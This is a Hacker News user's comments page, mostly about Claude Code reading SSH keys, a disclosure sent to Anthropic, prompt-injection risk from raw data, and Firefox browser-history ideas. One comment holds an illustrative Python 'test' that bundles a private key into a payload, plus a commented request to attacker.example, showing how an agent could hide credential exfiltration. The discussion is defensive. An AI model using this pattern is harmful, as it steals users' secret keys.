espeed's comments | Hacker News

Such as Claude Code reading your SSH keys. Hiding the file names masks the vulnerability.


That's approaching the problem from the worst possible angle. If your security depends on you catching 1 message in a sea of output and quickly rotating the credential everywhere before someone has a chance to abuse it then you were never secure to begin with.

Not just because it requires constant attention, which will eventually lapse, but because the agent has an unlimited number of ways to exfiltrate the key. For example, it can pretend to write and run a "test" that reads your key and sends it to the attacker, and you'll have no idea it's happening.
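To make the threat concrete, here's a hedged sketch of what such a "test" could look like. Everything here is hypothetical (the function name, the "diagnostics" field, the attacker URL in the comment); the point is only that the exfiltration step is indistinguishable from ordinary test output.

```python
# Hypothetical illustration of the attack described above: a "test"
# the agent writes and runs looks innocuous, but quietly bundles a
# private key into its payload. All names/paths here are illustrative.
from pathlib import Path

def build_test_payload(key_path: str) -> dict:
    """Pretends to collect 'test diagnostics' but includes the key."""
    key = Path(key_path).read_text()
    return {
        "test_name": "test_ssh_config",   # looks like a normal test
        "status": "passed",
        "diagnostics": key,               # the exfiltrated secret
    }

# An attacker-controlled "test" would then ship the payload out, e.g.:
#   requests.post("https://attacker.example/collect", json=payload)
# which looks like ordinary test telemetry in the logs.
```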


I sent an email to Anthropic (usersafety@anthropic.com, disclosure@anthropic.com) on January 8, 2025 alerting them to this issue: "Claude Code Exploit: Claude Code Becomes an Unwitting Executor." If I hadn't seen Claude Code read my SSH key file, I wouldn't have known the extent of the issue.


To improve the Claude model, it seems to me that any time Claude Code is working with data, the first step should be to use a tool like genson (https://github.com/wolverdude/GenSON) to extract the data model and then create "why" files (metadata files) for the data. Claude Code seems eager to use the /tmp space, so even if the end user doesn't care, Claude Code could do this internally for best results. It would save tokens: if genson reads the GBs of data, then Claude doesn't have to. And further, reading the raw data is a path to prompt injection. Let genson read the data, and let Claude work on the metadata.


Correction: January 8, 2026


I agree with you, but I think there's a "defense in depth" angle to this. Yes, your security shouldn't depend on noticing which files Claude has read, since you'll mess up. But hiding the information means you're guaranteed never to notice! It's good for the user to have signals that something might be going wrong.


There's no defense "in depth" here. It's like putting your SSH key in your public webroot and watching the logs to see if anyone's taken it. That's your only layer of "defense," and you don't stand any chance of enforcing it. Real defense is rooted in technical measures, imperfect as they may be; this is just defense through wishful thinking.


Obviously, don't put your SSH keys in a public webroot. But let's say you're managing a web server and have a decent security mindset. Don't you think it's better to regularly check the logs for evidence of an attack than to delete all the logs so they can't be checked?


Why does it have access to those paths?


Have we entered the age of AI programming people?


Rather than develop its own AI (https://news.ycombinator.com/item?id=45926779), Firefox should develop a system that pipes your HTML-rendered browsing history in real time so external local services can process it (https://connect.mozilla.org/t5/ideas/archive-your-browser-hi...). See https://news.ycombinator.com/item?id=45743918

Firefox probably won't suddenly have the best AI, but it could be the only browser that does this. Previous: https://news.ycombinator.com/item?id=46018789


Someone needs to convince Firefox, rather than developing its own AI (https://news.ycombinator.com/item?id=45926779), to develop a system that pipes your HTML-rendered browsing history in real time so external local services can process it (https://connect.mozilla.org/t5/ideas/archive-your-browser-hi...). See https://news.ycombinator.com/item?id=45743918

Firefox probably won't suddenly have the best AI, but it could be the only browser that does this.


You can already do what you're looking for by reading the browser cache as new data is cached. This would allow you to see the site as it was loaded originally, instead of simply fetching an updated view from a URL. The data layout for the cache in Firefox and Chrome is available online.


Does the cache store the rendered DOM?


They'd probably reject that idea with some bullshit privacy or security excuse, Wayland-like reasoning. It's also why we don't have XUL extensions anymore and why they'll eventually copy Chrome on that manifest crap.


I paid for Gemini Pro. Am I getting Gemini 3 Pro (https://gemini.google.com)? "To be precise: You are currently interacting with Gemini 1.5 Pro." https://x.com/espeed/status/1991333475098718601



Knowing this is the direction things were headed, I have been trying to get Firefox and Google to create a feature that archives your browser history and pipes a stream of it in real time so that open-source personal AI engines can ingest it and index it.

https://connect.mozilla.org/t5/ideas/archive-your-browser-hi...


AFAICS this has nothing to do with "open-source personal AI engines".

The recorded history is stored in a SQLite database and is quite trivial to examine [0][1]. A simple script could extract the information and feed it to your indexer of choice. Developing such a script isn't a task for an internet browser engineering team.

The question remains whether the indexer would really benefit from real-time ingestion while browsing.

[0] Firefox: https://www.foxtonforensics.com/browser-history-examiner/fir...

[1] Chrome: https://www.foxtonforensics.com/browser-history-examiner/chr...
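As a sketch of the "simple script" described above, assuming Firefox's documented `moz_places` table (the profile path varies by OS and profile, and Firefox may lock the live file, so copy it first):

```python
# Pull recent history straight out of Firefox's places.sqlite.
import sqlite3

def recent_history(db_path: str, limit: int = 20):
    """Return (url, title, last visit time in µs since epoch) rows."""
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute(
            """
            SELECT url, title, last_visit_date
            FROM moz_places
            WHERE last_visit_date IS NOT NULL
            ORDER BY last_visit_date DESC
            LIMIT ?
            """,
            (limit,),
        ).fetchall()
    finally:
        con.close()
    return rows

# e.g. recent_history("~/.mozilla/firefox/<profile>/places.sqlite")
# Each row could then be handed off to the indexer of your choice.
```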


Due to the dynamic nature of the Web, URLs don't map to what you've seen. If I visit a URL at a certain time, the content I see is different from the content you see, or even from what I'd see visiting the same URL later. For example, if we want to know that the tweets I'm seeing are the same as the tweets you're seeing and haven't been subtly modified by an AI, how do we do that? In the age of AI programming people, this will be important.
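One hedged sketch of how two viewers could compare what they saw: hash the whitespace-normalized rendered text and exchange digests out of band. This is an illustration, not a proposal from the thread; real pages would need far more careful normalization (timestamps, ads, personalization).

```python
# Fingerprint the visible text of a rendered page for comparison.
import hashlib

def content_fingerprint(rendered_text: str) -> str:
    """SHA-256 of whitespace-normalized rendered text."""
    normalized = " ".join(rendered_text.split())
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()

# A mismatch between two viewers' fingerprints flags that one of them
# was shown a (possibly AI-modified) variant of the same URL.
a = content_fingerprint("Tweet: the launch is at  9am.\n")
b = content_fingerprint("Tweet: the launch is at 9am.")
```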


I'm confused, do you want more than the browser history then? ...something like Microsoft's Recall? Browsers currently don't store what they've seen and for good reasons. I was with you for a sec, but good luck convincing Mozilla to propagate rendered pages to other processes then!


Being able to index and own your data changes the model of the Web.


So you're one of those people trying to attach history to everything!

Yeah I am sure lots of people want their pornhub history integrated into AI...

If that is the "future" (gag), we better be able to opt out


It's your personal AI running locally on your machine, you can opt out of what you index. You own your data.


Why not Chrome Devtools MCP?


I understand GP as wanting to browse normally and have that session's history feed into another indexing process via some IPC like D-Bus. It's meant to receive human events from the browser.

Chrome Devtools MCP on the other hand is a browser automation tool. Its purpose is to make it trivial to send programmed events/event-flows to a browser session.


The universities need to get together and develop their own open-source search engine as part of an ongoing research project. It should be hosted in a distributed fashion from the universities themselves. They have the expertise and the resources these days to do it. And much of the high quality content on the public web originates from the universities anyway. It will be like the Library of Alexandria and not subject to censorship.


There needs to be a browser that archives your browser history and pipes a stream of it in real time so that open-source personal AI engines can ingest it and index it. The future of the Web will be built on this. Google may not do it. Firefox could.


Knuth's ChatGPT Experiment Insights https://gemini.google.com/share/3768c883b67c


